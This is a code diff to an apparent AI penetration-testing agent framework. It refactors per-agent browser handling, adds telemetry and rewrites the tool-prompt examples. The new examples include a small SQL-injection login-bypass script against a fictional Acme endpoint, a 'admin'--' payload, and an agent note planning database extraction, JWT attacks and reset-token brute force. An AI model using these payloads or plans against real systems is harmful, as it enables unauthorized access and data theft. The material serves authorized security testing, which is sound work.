if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.forward(tab_id)
|
||||
result = browser.forward(tab_id)
|
||||
result["message"] = "Navigated forward"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to go forward: {e}") from e
|
||||
@@ -110,12 +123,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def new_tab(self, url: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.new_tab(url)
|
||||
result = browser.new_tab(url)
|
||||
result["message"] = f"Created new tab {result.get('tab_id', '')}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to create new tab: {e}") from e
|
||||
@@ -123,12 +136,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def switch_tab(self, tab_id: str) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.switch_tab(tab_id)
|
||||
result = browser.switch_tab(tab_id)
|
||||
result["message"] = f"Switched to tab {tab_id}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to switch tab: {e}") from e
|
||||
@@ -136,12 +149,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def close_tab(self, tab_id: str) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.close_tab(tab_id)
|
||||
result = browser.close_tab(tab_id)
|
||||
result["message"] = f"Closed tab {tab_id}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to close tab: {e}") from e
|
||||
@@ -149,12 +162,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.wait(duration, tab_id)
|
||||
result = browser.wait(duration, tab_id)
|
||||
result["message"] = f"Waited {duration}s"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to wait: {e}") from e
|
||||
@@ -162,12 +175,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.execute_js(js_code, tab_id)
|
||||
result = browser.execute_js(js_code, tab_id)
|
||||
result["message"] = "JavaScript executed successfully"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
|
||||
@@ -175,12 +188,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.double_click(coordinate, tab_id)
|
||||
result = browser.double_click(coordinate, tab_id)
|
||||
result["message"] = f"Double clicked at {coordinate}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to double click: {e}") from e
|
||||
@@ -188,12 +201,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.hover(coordinate, tab_id)
|
||||
result = browser.hover(coordinate, tab_id)
|
||||
result["message"] = f"Hovered at {coordinate}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to hover: {e}") from e
|
||||
@@ -201,12 +214,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.press_key(key, tab_id)
|
||||
result = browser.press_key(key, tab_id)
|
||||
result["message"] = f"Pressed key {key}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to press key: {e}") from e
|
||||
@@ -214,12 +227,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.save_pdf(file_path, tab_id)
|
||||
result = browser.save_pdf(file_path, tab_id)
|
||||
result["message"] = f"Page saved as PDF: {file_path}"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to save PDF: {e}") from e
|
||||
@@ -227,12 +240,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.get_console_logs(tab_id, clear)
|
||||
result = browser.get_console_logs(tab_id, clear)
|
||||
action_text = "cleared and retrieved" if clear else "retrieved"
|
||||
|
||||
logs = result.get("console_logs", [])
|
||||
@@ -249,12 +262,12 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
raise ValueError("Browser not launched")
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
result = self.browser_instance.view_source(tab_id)
|
||||
result = browser.view_source(tab_id)
|
||||
result["message"] = "Page source retrieved"
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to get page source: {e}") from e
|
||||
@@ -262,18 +275,18 @@ class BrowserTabManager:
|
||||
return result
|
||||
|
||||
def list_tabs(self) -> dict[str, Any]:
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
return {"tabs": {}, "total_count": 0, "current_tab": None}
|
||||
browser = self._get_agent_browser()
|
||||
if browser is None:
|
||||
return {"tabs": {}, "total_count": 0, "current_tab": None}
|
||||
|
||||
try:
|
||||
tab_info = {}
|
||||
for tid, tab_page in self.browser_instance.pages.items():
|
||||
for tid, tab_page in browser.pages.items():
|
||||
try:
|
||||
tab_info[tid] = {
|
||||
"url": tab_page.url,
|
||||
"title": "Unknown" if tab_page.is_closed() else "Active",
|
||||
"is_current": tid == self.browser_instance.current_page_id,
|
||||
"is_current": tid == browser.current_page_id,
|
||||
}
|
||||
except (AttributeError, RuntimeError):
|
||||
tab_info[tid] = {
|
||||
@@ -285,19 +298,20 @@ class BrowserTabManager:
|
||||
return {
|
||||
"tabs": tab_info,
|
||||
"total_count": len(tab_info),
|
||||
"current_tab": self.browser_instance.current_page_id,
|
||||
"current_tab": browser.current_page_id,
|
||||
}
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to list tabs: {e}") from e
|
||||
|
||||
def close_browser(self) -> dict[str, Any]:
|
||||
agent_id = get_current_agent_id()
|
||||
with self._lock:
|
||||
if self.browser_instance is None:
|
||||
browser = self._browsers_by_agent.pop(agent_id, None)
|
||||
if browser is None:
|
||||
raise ValueError("Browser not launched")
|
||||
|
||||
try:
|
||||
self.browser_instance.close()
|
||||
self.browser_instance = None
|
||||
browser.close()
|
||||
except (OSError, ValueError, RuntimeError) as e:
|
||||
raise RuntimeError(f"Failed to close browser: {e}") from e
|
||||
else:
|
||||
@@ -307,33 +321,38 @@ class BrowserTabManager:
|
||||
"is_running": False,
|
||||
}
|
||||
|
||||
def cleanup_agent(self, agent_id: str) -> None:
|
||||
with self._lock:
|
||||
browser = self._browsers_by_agent.pop(agent_id, None)
|
||||
|
||||
if browser:
|
||||
with contextlib.suppress(Exception):
|
||||
browser.close()
|
||||
|
||||
def cleanup_dead_browser(self) -> None:
|
||||
with self._lock:
|
||||
if self.browser_instance and not self.browser_instance.is_alive():
|
||||
dead_agents = []
|
||||
for agent_id, browser in self._browsers_by_agent.items():
|
||||
if not browser.is_alive():
|
||||
dead_agents.append(agent_id)
|
||||
|
||||
for agent_id in dead_agents:
|
||||
browser = self._browsers_by_agent.pop(agent_id)
|
||||
with contextlib.suppress(Exception):
|
||||
self.browser_instance.close()
|
||||
self.browser_instance = None
|
||||
browser.close()
|
||||
|
||||
def close_all(self) -> None:
|
||||
with self._lock:
|
||||
if self.browser_instance:
|
||||
with contextlib.suppress(Exception):
|
||||
self.browser_instance.close()
|
||||
self.browser_instance = None
|
||||
browsers = list(self._browsers_by_agent.values())
|
||||
self._browsers_by_agent.clear()
|
||||
|
||||
for browser in browsers:
|
||||
with contextlib.suppress(Exception):
|
||||
browser.close()
|
||||
|
||||
def _register_cleanup_handlers(self) -> None:
|
||||
atexit.register(self.close_all)
|
||||
|
||||
signal.signal(signal.SIGTERM, self._signal_handler)
|
||||
signal.signal(signal.SIGINT, self._signal_handler)
|
||||
|
||||
if hasattr(signal, "SIGHUP"):
|
||||
signal.signal(signal.SIGHUP, self._signal_handler)
|
||||
|
||||
def _signal_handler(self, _signum: int, _frame: Any) -> None:
|
||||
self.close_all()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
_browser_tab_manager = BrowserTabManager()
|
||||
|
||||
|
||||
12
strix/tools/context.py
Normal file
12
strix/tools/context.py
Normal file
@@ -0,0 +1,12 @@
|
||||
from contextvars import ContextVar
|
||||
|
||||
|
||||
current_agent_id: ContextVar[str] = ContextVar("current_agent_id", default="default")
|
||||
|
||||
|
||||
def get_current_agent_id() -> str:
|
||||
return current_agent_id.get()
|
||||
|
||||
|
||||
def set_current_agent_id(agent_id: str) -> None:
|
||||
current_agent_id.set(agent_id)
|
||||
@@ -5,6 +5,7 @@ from typing import Any
|
||||
import httpx
|
||||
|
||||
from strix.config import Config
|
||||
from strix.telemetry import posthog
|
||||
|
||||
|
||||
if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
|
||||
@@ -20,7 +21,8 @@ from .registry import (
|
||||
)
|
||||
|
||||
|
||||
SANDBOX_EXECUTION_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "120")
|
||||
_SERVER_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "120")
|
||||
SANDBOX_EXECUTION_TIMEOUT = _SERVER_TIMEOUT + 30
|
||||
SANDBOX_CONNECT_TIMEOUT = float(Config.get("strix_sandbox_connect_timeout") or "10")
|
||||
|
||||
|
||||
@@ -82,14 +84,18 @@ async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: A
|
||||
response.raise_for_status()
|
||||
response_data = response.json()
|
||||
if response_data.get("error"):
|
||||
posthog.error("tool_execution_error", f"{tool_name}: {response_data['error']}")
|
||||
raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
|
||||
return response_data.get("result")
|
||||
except httpx.HTTPStatusError as e:
|
||||
posthog.error("tool_http_error", f"{tool_name}: HTTP {e.response.status_code}")
|
||||
if e.response.status_code == 401:
|
||||
raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
|
||||
raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
|
||||
except httpx.RequestError as e:
|
||||
raise RuntimeError(f"Request error calling tool server: {e}") from e
|
||||
error_type = type(e).__name__
|
||||
posthog.error("tool_request_error", f"{tool_name}: {error_type}")
|
||||
raise RuntimeError(f"Request error calling tool server: {error_type}") from e
|
||||
|
||||
|
||||
async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
|
||||
|
||||
@@ -104,8 +104,30 @@
|
||||
# Create a file
|
||||
<function=str_replace_editor>
|
||||
<parameter=command>create</parameter>
|
||||
<parameter=path>/home/user/project/new_file.py</parameter>
|
||||
<parameter=file_text>print("Hello World")</parameter>
|
||||
<parameter=path>/home/user/project/exploit.py</parameter>
|
||||
<parameter=file_text>#!/usr/bin/env python3
|
||||
"""SQL Injection exploit for Acme Corp login endpoint."""
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
TARGET = "https://app.acme-corp.com/api/v1/auth/login"
|
||||
|
||||
def exploit(username: str) -> dict:
|
||||
payload = {
|
||||
"username": f"{username}'--",
|
||||
"password": "anything"
|
||||
}
|
||||
response = requests.post(TARGET, json=payload, timeout=10)
|
||||
return response.json()
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <username>")
|
||||
sys.exit(1)
|
||||
|
||||
result = exploit(sys.argv[1])
|
||||
print(f"Result: {result}")</parameter>
|
||||
</function>
|
||||
|
||||
# Replace text in file
|
||||
@@ -121,7 +143,27 @@
|
||||
<parameter=command>insert</parameter>
|
||||
<parameter=path>/home/user/project/file.py</parameter>
|
||||
<parameter=insert_line>10</parameter>
|
||||
<parameter=new_str>print("Inserted line")</parameter>
|
||||
<parameter=new_str>def validate_input(user_input: str) -> bool:
|
||||
"""Validate user input to prevent injection attacks."""
|
||||
forbidden_chars = ["'", '"', ";", "--", "/*", "*/"]
|
||||
for char in forbidden_chars:
|
||||
if char in user_input:
|
||||
return False
|
||||
return True</parameter>
|
||||
</function>
|
||||
|
||||
# Replace code block
|
||||
<function=str_replace_editor>
|
||||
<parameter=command>str_replace</parameter>
|
||||
<parameter=path>/home/user/project/auth.py</parameter>
|
||||
<parameter=old_str>def authenticate(username, password):
|
||||
query = f"SELECT * FROM users WHERE username = '{username}'"
|
||||
result = db.execute(query)
|
||||
return result</parameter>
|
||||
<parameter=new_str>def authenticate(username, password):
|
||||
query = "SELECT * FROM users WHERE username = %s"
|
||||
result = db.execute(query, (username,))
|
||||
return result</parameter>
|
||||
</function>
|
||||
</examples>
|
||||
</tool>
|
||||
|
||||
@@ -66,5 +66,87 @@ Professional, customer-facing penetration test report rules (PDF-ready):
|
||||
<returns type="Dict[str, Any]">
|
||||
<description>Response containing success status, vulnerability count, and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
|
||||
</returns>
|
||||
<examples>
|
||||
|
||||
<function=finish_scan>
|
||||
<parameter=executive_summary>Executive summary
|
||||
An external penetration test of the Acme Customer Portal and associated API identified multiple security weaknesses that, if exploited, could result in unauthorized access to customer data, cross-tenant exposure, and access to internal network resources.
|
||||
|
||||
Overall risk posture: Elevated.
|
||||
|
||||
Key outcomes
|
||||
- Confirmed server-side request forgery (SSRF) in a URL preview capability that enables the application to initiate outbound requests to attacker-controlled destinations and internal network ranges.
|
||||
- Identified broken access control patterns in business-critical workflows that can enable cross-tenant data access (tenant isolation failures).
|
||||
- Observed session and authorization hardening gaps that materially increase risk when combined with other weaknesses.
|
||||
|
||||
Business impact
|
||||
- Increased likelihood of sensitive data exposure across customers/tenants, including invoices, orders, and account information.
|
||||
- Increased risk of internal service exposure through server-side outbound request functionality (including link-local and private network destinations).
|
||||
- Increased potential for account compromise and administrative abuse if tokens are stolen or misused.
|
||||
|
||||
Remediation theme
|
||||
Prioritize eliminating SSRF pathways and centralizing authorization enforcement (deny-by-default). Follow with session hardening and monitoring improvements, then validate with a focused retest.</parameter>
|
||||
<parameter=methodology>Methodology
|
||||
The assessment followed industry-standard penetration testing practices aligned to OWASP Web Security Testing Guide (WSTG) concepts and common web/API security testing methodology.
|
||||
|
||||
Engagement details
|
||||
- Assessment type: External penetration test (black-box with limited gray-box context)
|
||||
- Target environment: Production-equivalent staging
|
||||
|
||||
Scope (in-scope assets)
|
||||
- Web application: https://app.acme-corp.com
|
||||
- API base: https://app.acme-corp.com/api/v1/
|
||||
|
||||
High-level testing activities
|
||||
- Reconnaissance and attack-surface mapping (routes, parameters, workflows)
|
||||
- Authentication and session management review (token handling, session lifetime, sensitive actions)
|
||||
- Authorization and tenant-isolation testing (object access and privilege boundaries)
|
||||
- Input handling and server-side request testing (URL fetchers, imports, previews, callbacks)
|
||||
- File handling and content rendering review (uploads, previews, unsafe content types)
|
||||
- Configuration review (transport security, security headers, caching behavior, error handling)
|
||||
|
||||
Evidence handling and validation standard
|
||||
Only validated issues with reproducible impact were treated as findings. Each finding was documented with clear reproduction steps and sufficient evidence to support remediation and verification testing.</parameter>
|
||||
<parameter=technical_analysis>Technical analysis
|
||||
This section provides a consolidated view of the confirmed findings and observed risk patterns. Detailed reproduction steps and evidence are documented in the individual vulnerability reports.
|
||||
|
||||
Severity model
|
||||
Severity reflects a combination of exploitability and potential impact to confidentiality, integrity, and availability, considering realistic attacker capabilities.
|
||||
|
||||
Confirmed findings (high level)
|
||||
1) Server-side request forgery (SSRF) in URL preview (Critical)
|
||||
The application fetches user-supplied URLs server-side to generate previews. Validation controls were insufficient to prevent access to internal and link-local destinations. This creates a pathway to internal network enumeration and potential access to sensitive internal services. Redirect and DNS/normalization bypass risk must be assumed unless controls are comprehensive and applied on every request hop.
|
||||
|
||||
2) Broken tenant isolation in order/invoice workflows (High)
|
||||
Multiple endpoints accepted object identifiers without consistently enforcing tenant ownership. This is indicative of broken function- and object-level authorization checks. In practice, this can enable cross-tenant access to business-critical resources (viewing or modifying data outside the attacker’s tenant boundary).
|
||||
|
||||
3) Administrative action hardening gaps (Medium)
|
||||
Several sensitive actions lacked defense-in-depth controls (e.g., re-authentication for high-risk actions, consistent authorization checks across related endpoints, and protections against session misuse). While not all behaviors were immediately exploitable in isolation, they increase the likelihood and blast radius of account compromise when chained with other vulnerabilities.
|
||||
|
||||
4) Unsafe file preview/content handling patterns (Medium)
|
||||
File preview and rendering behaviors can create exposure to script execution or content-type confusion if unsafe formats are rendered inline. Controls should be consistent: strong content-type validation, forced download where appropriate, and hardening against active content.
|
||||
|
||||
Systemic themes and root causes
|
||||
- Authorization enforcement appears distributed and inconsistent across endpoints instead of centralized and testable.
|
||||
- Outbound request functionality lacks a robust, deny-by-default policy for destination validation.
|
||||
- Hardening controls (session lifetime, sensitive-action controls, logging) are applied unevenly, increasing the likelihood of successful attack chains.</parameter>
|
||||
<parameter=recommendations>Recommendations
|
||||
Priority 0
|
||||
- Eliminate SSRF by implementing a strict destination allowlist and deny-by-default policy for outbound requests. Block private, loopback, and link-local ranges (IPv4 and IPv6) after DNS resolution. Re-validate on every redirect hop. Apply URL parsing/normalization safeguards against ambiguous encodings and unusual IP notations.
|
||||
- Apply network egress controls so the application runtime cannot reach sensitive internal ranges or link-local services. Route necessary outbound requests through a policy-enforcing egress proxy with logging.
|
||||
|
||||
Priority 1
|
||||
- Centralize authorization enforcement for all object access and administrative actions. Implement consistent tenant-ownership checks for every read/write path involving orders, invoices, and account resources. Adopt deny-by-default authorization middleware/policies.
|
||||
- Add regression tests for authorization decisions, including cross-tenant negative cases and privilege-boundary testing for administrative endpoints.
|
||||
- Harden session management: secure cookie attributes, session rotation after authentication and privilege change events, reduced session lifetime for privileged contexts, and consistent CSRF protections for state-changing actions.
|
||||
|
||||
Priority 2
|
||||
- Harden file handling and preview behaviors: strict content-type allowlists, forced download for active formats, safe rendering pipelines, and scanning/sanitization where applicable.
|
||||
- Improve monitoring and detection: alert on high-risk events such as repeated authorization failures, anomalous outbound fetch attempts, sensitive administrative actions, and unusual access patterns to business-critical resources.
|
||||
|
||||
Follow-up validation
|
||||
- Conduct a targeted retest after remediation to confirm SSRF controls, tenant isolation enforcement, and session hardening, and to ensure no bypasses exist via redirects, DNS rebinding, or encoding edge cases.</parameter>
|
||||
</function>
|
||||
</examples>
|
||||
</tool>
|
||||
</tools>
|
||||
|
||||
@@ -24,29 +24,54 @@
|
||||
<examples>
|
||||
# Document an interesting finding
|
||||
<function=create_note>
|
||||
<parameter=title>Interesting Directory Found</parameter>
|
||||
<parameter=content>Found /backup/ directory that might contain sensitive files. Directory listing
|
||||
seems disabled but worth investigating further.</parameter>
|
||||
<parameter=title>Authentication Bypass Findings</parameter>
|
||||
<parameter=content>Discovered multiple authentication bypass vectors in the login system:
|
||||
|
||||
1. SQL Injection in username field
|
||||
- Payload: admin'--
|
||||
- Result: Full authentication bypass
|
||||
- Endpoint: POST /api/v1/auth/login
|
||||
|
||||
2. JWT Token Weakness
|
||||
- Algorithm confusion attack possible (RS256 -> HS256)
|
||||
- Token expiration is 24 hours but no refresh rotation
|
||||
- Token stored in localStorage (XSS risk)
|
||||
|
||||
3. Password Reset Flow
|
||||
- Reset tokens are only 6 digits (brute-forceable)
|
||||
- No rate limiting on reset attempts
|
||||
- Token valid for 48 hours
|
||||
|
||||
Next Steps:
|
||||
- Extract full database via SQL injection
|
||||
- Test JWT manipulation attacks
|
||||
- Attempt password reset brute force</parameter>
|
||||
<parameter=category>findings</parameter>
|
||||
<parameter=tags>["directory", "backup"]</parameter>
|
||||
<parameter=tags>["auth", "sqli", "jwt", "critical"]</parameter>
|
||||
</function>
|
||||
|
||||
# Methodology note
|
||||
<function=create_note>
|
||||
<parameter=title>Authentication Flow Analysis</parameter>
|
||||
<parameter=content>The application uses JWT tokens stored in localStorage. Token expiration is
|
||||
set to 24 hours. Observed that refresh token rotation is not implemented.</parameter>
|
||||
<parameter=category>methodology</parameter>
|
||||
<parameter=tags>["auth", "jwt", "session"]</parameter>
|
||||
</function>
|
||||
<parameter=title>API Endpoint Mapping Complete</parameter>
|
||||
<parameter=content>Completed comprehensive API enumeration using multiple techniques:
|
||||
|
||||
# Research question
|
||||
<function=create_note>
|
||||
<parameter=title>Custom Header Investigation</parameter>
|
||||
<parameter=content>The API returns a custom X-Request-ID header. Need to research if this
|
||||
could be used for user tracking or has any security implications.</parameter>
|
||||
<parameter=category>questions</parameter>
|
||||
<parameter=tags>["headers", "research"]</parameter>
|
||||
Discovered Endpoints:
|
||||
- /api/v1/auth/* - Authentication endpoints (login, register, reset)
|
||||
- /api/v1/users/* - User management (profile, settings, admin)
|
||||
- /api/v1/orders/* - Order management (IDOR vulnerability confirmed)
|
||||
- /api/v1/admin/* - Admin panel (403 but may be bypassable)
|
||||
- /api/internal/* - Internal APIs (should not be exposed)
|
||||
|
||||
Methods Used:
|
||||
- Analyzed JavaScript bundles for API calls
|
||||
- Bruteforced common paths with ffuf
|
||||
- Reviewed OpenAPI/Swagger documentation at /api/docs
|
||||
- Monitored traffic during normal application usage
|
||||
|
||||
Priority Targets:
|
||||
The /api/internal/* endpoints are high priority as they appear to lack authentication checks based on error message differences.</parameter>
|
||||
<parameter=category>methodology</parameter>
|
||||
<parameter=tags>["api", "enumeration", "recon"]</parameter>
|
||||
</function>
|
||||
</examples>
|
||||
</tool>
|
||||
|
||||
@@ -1,4 +1,3 @@
|
||||
<?xml version="1.0" ?>
|
||||
<tools>
|
||||
<tool name="list_requests">
|
||||
<description>List and filter proxy requests using HTTPQL with pagination.</description>
|
||||
|
||||
@@ -16,17 +16,24 @@ if TYPE_CHECKING:
|
||||
from collections.abc import Callable
|
||||
|
||||
|
||||
CAIDO_PORT = 48080 # Fixed port inside container
|
||||
|
||||
|
||||
class ProxyManager:
|
||||
def __init__(self, auth_token: str | None = None):
|
||||
host = "127.0.0.1"
|
||||
port = os.getenv("CAIDO_PORT", "56789")
|
||||
self.base_url = f"http://{host}:{port}/graphql"
|
||||
self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
|
||||
self.base_url = f"http://{host}:{CAIDO_PORT}/graphql"
|
||||
self.proxies = {
|
||||
"http": f"http://{host}:{CAIDO_PORT}",
|
||||
"https": f"http://{host}:{CAIDO_PORT}",
|
||||
}
|
||||
self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
|
||||
self.transport = RequestsHTTPTransport(
|
||||
|
||||
def _get_client(self) -> Client:
|
||||
transport = RequestsHTTPTransport(
|
||||
url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
|
||||
)
|
||||
self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
|
||||
return Client(transport=transport, fetch_schema_from_transport=False)
|
||||
|
||||
def list_requests(
|
||||
self,
|
||||
@@ -85,7 +92,7 @@ class ProxyManager:
|
||||
}
|
||||
|
||||
try:
|
||||
result = self.client.execute(query, variable_values=variables)
|
||||
result = self._get_client().execute(query, variable_values=variables)
|
||||
data = result.get("requestsByOffset", {})
|
||||
nodes = [edge["node"] for edge in data.get("edges", [])]
|
||||
|
||||
@@ -132,7 +139,9 @@ class ProxyManager:
|
||||
return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
|
||||
|
||||
try:
|
||||
result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
|
||||
result = self._get_client().execute(
|
||||
gql(queries[part]), variable_values={"id": request_id}
|
||||
)
|
||||
request_data = result.get("request", {})
|
||||
|
||||
if not request_data:
|
||||
@@ -430,7 +439,9 @@ class ProxyManager:
|
||||
}
|
||||
|
||||
def _handle_scope_list(self) -> dict[str, Any]:
|
||||
result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
|
||||
result = self._get_client().execute(
|
||||
gql("query { scopes { id name allowlist denylist indexed } }")
|
||||
)
|
||||
scopes = result.get("scopes", [])
|
||||
return {"scopes": scopes, "count": len(scopes)}
|
||||
|
||||
@@ -438,7 +449,7 @@ class ProxyManager:
|
||||
if not scope_id:
|
||||
return self._handle_scope_list()
|
||||
|
||||
result = self.client.execute(
|
||||
result = self._get_client().execute(
|
||||
gql(
|
||||
"query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
|
||||
),
|
||||
@@ -467,7 +478,7 @@ class ProxyManager:
|
||||
}
|
||||
""")
|
||||
|
||||
result = self.client.execute(
|
||||
result = self._get_client().execute(
|
||||
mutation,
|
||||
variable_values={
|
||||
"input": {
|
||||
@@ -507,7 +518,7 @@ class ProxyManager:
|
||||
}
|
||||
""")
|
||||
|
||||
result = self.client.execute(
|
||||
result = self._get_client().execute(
|
||||
mutation,
|
||||
variable_values={
|
||||
"id": scope_id,
|
||||
@@ -530,7 +541,7 @@ class ProxyManager:
|
||||
if not scope_id:
|
||||
return {"error": "scope_id required for delete"}
|
||||
|
||||
result = self.client.execute(
|
||||
result = self._get_client().execute(
|
||||
gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
|
||||
variable_values={"id": scope_id},
|
||||
)
|
||||
@@ -607,7 +618,7 @@ class ProxyManager:
|
||||
}
|
||||
}
|
||||
""")
|
||||
result = self.client.execute(
|
||||
result = self._get_client().execute(
|
||||
query, variable_values={"parentId": parent_id, "depth": depth}
|
||||
)
|
||||
data = result.get("sitemapDescendantEntries", {})
|
||||
@@ -624,7 +635,7 @@ class ProxyManager:
|
||||
}
|
||||
}
|
||||
""")
|
||||
result = self.client.execute(query, variable_values={"scopeId": scope_id})
|
||||
result = self._get_client().execute(query, variable_values={"scopeId": scope_id})
|
||||
data = result.get("sitemapRootEntries", {})
|
||||
|
||||
all_nodes = [edge["node"] for edge in data.get("edges", [])]
|
||||
@@ -731,7 +742,7 @@ class ProxyManager:
|
||||
}
|
||||
""")
|
||||
|
||||
result = self.client.execute(query, variable_values={"id": entry_id})
|
||||
result = self._get_client().execute(query, variable_values={"id": entry_id})
|
||||
entry = result.get("sitemapEntry")
|
||||
|
||||
if not entry:
|
||||
@@ -780,6 +791,7 @@ _PROXY_MANAGER: ProxyManager | None = None
|
||||
|
||||
|
||||
def get_proxy_manager() -> ProxyManager:
|
||||
global _PROXY_MANAGER # noqa: PLW0603
|
||||
if _PROXY_MANAGER is None:
|
||||
return ProxyManager()
|
||||
_PROXY_MANAGER = ProxyManager()
|
||||
return _PROXY_MANAGER
|
||||
|
||||
@@ -1,4 +1,3 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<tools>
|
||||
<tool name="python_action">
|
||||
<description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
|
||||
@@ -55,7 +54,7 @@
|
||||
- Print statements and stdout are captured
|
||||
- Variables persist between executions in the same session
|
||||
- Imports, function definitions, etc. persist in the session
|
||||
- IMPORTANT (multiline): Put real line breaks in <parameter=code>. Do NOT emit literal "\n" sequences.
|
||||
